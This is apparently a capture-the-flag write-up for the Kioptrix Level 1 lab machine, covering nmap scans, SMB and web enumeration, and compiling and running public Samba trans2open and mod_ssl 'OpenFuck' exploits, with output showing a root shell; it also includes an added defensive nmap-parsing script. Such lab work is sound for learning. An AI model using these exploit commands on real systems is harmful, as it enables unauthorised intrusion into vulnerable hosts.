
Escape

Overview

| Field | Value |
|---|---|
| Name | Template |
| Release Date | 2024-02-24 |
| Write-up Author | Kill3r |
| Machine Author | Kill3r |
| Difficulty | Medium |
| User Flag | |
| Root Flag | |
| Link | https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ |

Related skills

  1. SMB exploit
  2. mod_ssl exploit

Weak points

  1. Handling gcc compilation

Nmap scan

```bash
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.9 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')
nmap -p$ports -sV -sC -O 10.10.10.9 -oN nmap.txt
# Line 1: nmap scans every port (1-65535) on the target host; --min-rate=1000 sends at least 1000 packets per second,
# and -T4 selects the aggressive timing template for a fast scan.
# grep -oE '(^[0-9][^/tcp]*)' extracts the port number at the start of each port line, and tr '\n' ',' joins the
# extracted numbers into one comma-separated string.
# Line 2: nmap rescans only the extracted ports: -p$ports is the port list from step 1, -sV detects service versions,
# -sC runs the default NSE scripts (which include common vulnerability checks), -O fingerprints the operating system,
# and -oN nmap.txt saves the results to a file named nmap.txt.
```
```bash
┌──(root㉿kill3r)-[/home/kill3r]
└─# ports=$(nmap -p- --min-rate=1000 -T4 192.168.56.101 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')
┌──(root㉿kill3r)-[/home/kill3r]
└─# nmap -p$ports -sV -sC -O 192.168.56.101 -oN nmap.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-04 20:27 CST
Nmap scan report for 10.10.10.9
Host is up (0.00022s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| http-methods:
|_ Potentially risky methods: TRACE
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1024/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_ssl-date: 2023-08-04T12:29:55+00:00; +1m50s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after: 2010-09-26T09:32:06
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:7C:3A:16 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: 1m49s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.82 seconds
```
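The two-step scan above turns nmap's normal output into a port list with `grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ','`. Two details of that pipeline are worth knowing: `[^/tcp]` is a character class (any character except `/`, `t`, `c` or `p`), not the string `/tcp`, and `tr` leaves a trailing comma on the list. The POSIX shell script below is an added example, not code from the write-up: it parses a constructed nmap excerpt (modelled on the scan output above) into a clean comma-separated list of open TCP ports, keying on the STATE column so that individually listed filtered or closed ports are excluded, and it also pulls out the legacy-protocol findings the default scripts report on this host (SSHv1, SSLv2, an expired certificate), which is the triage a defender would do with the same output. The function names `open_tcp_ports` and `legacy_protocol_findings` and the `SAMPLE_SCAN` variable are this example's own.

```bash
#!/bin/sh
# Added example (not from the write-up): parse nmap normal output into an
# open-port list and a short list of legacy-protocol findings.
# SAMPLE_SCAN is a constructed excerpt shaped like the page's nmap output;
# the 2049 and 3306 lines are added to show that non-open ports are skipped.
SAMPLE_SCAN='Nmap scan report for 10.10.10.9
Host is up (0.00022s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| Not valid before: 2009-09-26T09:32:06
|_Not valid after: 2010-09-26T09:32:06
| sslv2:
|   SSLv2 supported
1024/tcp open status 1 (RPC #100024)
2049/tcp filtered nfs
3306/tcp closed mysql'

# open_tcp_ports SCAN_TEXT
# Prints open TCP ports as "22,80,..." with no trailing comma.
# Splitting on "/" gives the port in $1 and "tcp <state> ..." in $2, so the
# state column is checked explicitly; paste -s joins without a trailing comma.
open_tcp_ports() {
    printf '%s\n' "$1" \
        | awk -F'/' '$1 ~ /^[0-9]+$/ && $2 ~ /^tcp +open/ { print $1 }' \
        | paste -sd, -
}

# legacy_protocol_findings SCAN_TEXT
# Prints one "<port> <finding>" line per weak-protocol indicator that the
# default scripts report. The port is remembered from the last port line
# seen, since script output lines are indented under their port.
legacy_protocol_findings() {
    printf '%s\n' "$1" | awk '
        /^[0-9]+\/tcp/            { split($1, p, "/"); port = p[1] }
        /Server supports SSHv1/   { print port " sshv1" }
        /^\| +SSLv2 supported/    { print port " sslv2" }
        /^\|_?Not valid after:/   { print port " cert-expiry " $NF }
    '
}

# Stand-alone usage: run both parsers over the constructed sample.
open_tcp_ports "$SAMPLE_SCAN"
legacy_protocol_findings "$SAMPLE_SCAN"
```

To use it on a real scan, pass the saved output instead of the sample, for example `open_tcp_ports "$(cat nmap.txt)"`; the resulting list can be fed to `-p` directly because it carries no trailing comma. The findings list is intentionally limited to indicators that appear verbatim in nmap's script output, so it produces no false positives from service banners alone.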

Enumeration

SMB enumeration

Port: 139 389 445 636

enum4linux -a/-A 127.0.0.1

```bash
┌──(root㉿kill3r)-[/home/kill3r]
└─$ enum4linux -A 10.10.10.9
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Aug 4 20:29:56 2023

=========================================( Target Information )=========================================

Target ........... 10.10.10.9
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


=============================( Enumerating Workgroup/Domain on 10.10.10.9 )=============================


[+] Got domain/workgroup name: MYGROUP


====================================( Session Check on 10.10.10.9 )====================================


[+] Server 10.10.10.9 allows sessions using username '', password ''


=================================( Getting domain SID for 10.10.10.9 )=================================

Domain Name: MYGROUP
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup

enum4linux complete on Fri Aug 4 20:29:56 2023
```
- MSF-SMB
```bash
# Fingerprint the SMB version over the SMB protocol
msf6 > use auxiliary/scanner/smb/smb_version
[*] 10.10.10.9:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 10.10.10.9:139 - Host could not be identified: Unix (Samba 2.2.1a)
[*] 10.10.10.9: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
# Enumerate shared folders
msf6 > use auxiliary/scanner/smb/smb_enumshares
[*] 10.10.10.9:139 - Starting module
[*] 10.10.10.9:445 - Starting module
[*] 10.10.10.9: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
# Enumerate user information over SMB
msf6 > use auxiliary/scanner/smb/smb_lookupsid
[*] 10.10.10.9: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Web

HTTP web server, common ports: 80 443 81 8080 8443 4443 8081

- Finger: retrieves information about a specific user, or the list of users and their configuration on the system

whatweb

```bash
# Identifies and analyzes the target site's technology stack, CMS (content management system), plugins, frameworks
# and other site-related details by inspecting the site's responses and page content
┌──(root㉿kill3r)-[~]
└─# whatweb 10.10.10.9
http://10.10.10.9 [200 OK] Apache[1.3.20][mod_ssl/2.8.4], Country[RESERVED][ZZ], Email[webmaster@example.com], HTTPServer[Red Hat Linux][Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b], IP[10.10.10.9], OpenSSL[0.9.6b], Title[Test Page for the Apache Web Server on Red Hat Linux]
```
- Directory enumeration

dirb http://192.168.56.101

dirsearch -u http://192.168.56.101 -r

gobuster dir -w ... -u http://192.168.56.101 -x html,php,js,bak

```bash
┌──(root㉿kill3r)-[~]
└─# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.9 -x html,php,js,bak
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.9
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,php,js,bak
[+] Timeout: 10s
===============================================================
2023/08/04 22:41:08 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 269]
/index.html (Status: 200) [Size: 2890]
/test.php (Status: 200) [Size: 27]
/manual (Status: 301) [Size: 294] [--> http://127.0.0.1/manual/]
/usage (Status: 301) [Size: 293] [--> http://127.0.0.1/usage/]
/mrtg (Status: 301) [Size: 292] [--> http://127.0.0.1/mrtg/]
/.html (Status: 403) [Size: 269]
Progress: 1100338 / 1102805 (99.78%)
===============================================================
2023/08/04 22:46:47 Finished
===============================================================
```
- Vulnerability scanning

```bash
$ nikto -h http://www.example.com/
$ nuclei -u https://example.com/
```

wordlist

- cewl.list: `cewl http://192.168.56.101/ -w dict.txt`
- pass.list
- user.list
- hash.list
- information.list

Wappalyzer

```
Web server: Apache HTTP Server 1.3.20
Operating system: UNIX
Web server extension: OpenSSL 0.9.6b
mod_ssl: 2.8.4
```

Reproduction steps

Visit the target and look for application functionality.

No functionality found; move on to analyzing the other services.

Information analysis

SMB

- Samba 2.2.1a

```bash
┌──(root㉿kill3r)-[/home/kill3r]
└─$ searchsploit Samba 2.2.1a
---------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                              | Path
---------------------------------------------------------------------------- ---------------------------------
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)                | osx/remote/9924.rb
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution                           | multiple/remote/10.c
Samba < 3.0.20 - Remote Heap Overflow                                       | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                               | linux_x86/dos/36741.py
---------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
```

After testing, 10.c turned out to work and gave a shell directly.

```bash
┌──(root㉿kill3r)-[/home/kill3r]
└─$ gcc 10.c -o samba

┌──(root㉿kill3r)-[/home/kill3r]
└─$ ./samba -b O 10.10.10.9
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
```
- mod_ssl 2.8.4
```bash
┌──(root㉿kill3r)-[~/.ssh]
└─# searchsploit mod_ssl 2.8.4
---------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                              | Path
---------------------------------------------------------------------------- ---------------------------------
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow        | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)  | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)  | unix/remote/47080.c
---------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results


┌──(root㉿kill3r)-[/home/kill3r]
└─# gcc -o OpenFuck 47080.c -lcrypto

┌──(root㉿kill3r)-[/home/kill3r]
└─# ./OpenFuck -h | grep apache-1.3.20
0x02 - Cobalt Sun 6.0 (apache-1.3.20)
0x27 - FreeBSD (apache-1.3.20)
0x28 - FreeBSD (apache-1.3.20)
0x29 - FreeBSD (apache-1.3.20+2.8.4)
0x2a - FreeBSD (apache-1.3.20_1)
0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
0x7e - Slackware Linux 8.0 (apache-1.3.20)
0x86 - SuSE Linux 7.3 (apache-1.3.20)

# I only got apache privileges here; I suspect something went wrong during compilation
┌──(root㉿kill3r)-[/home/kill3r]
└─# ./OpenFuck 0x6b 10.10.10.9
```

Flag as user1

Shell as user1

Shell as user2

Shell as root

Save a screenshot as the flag or proof.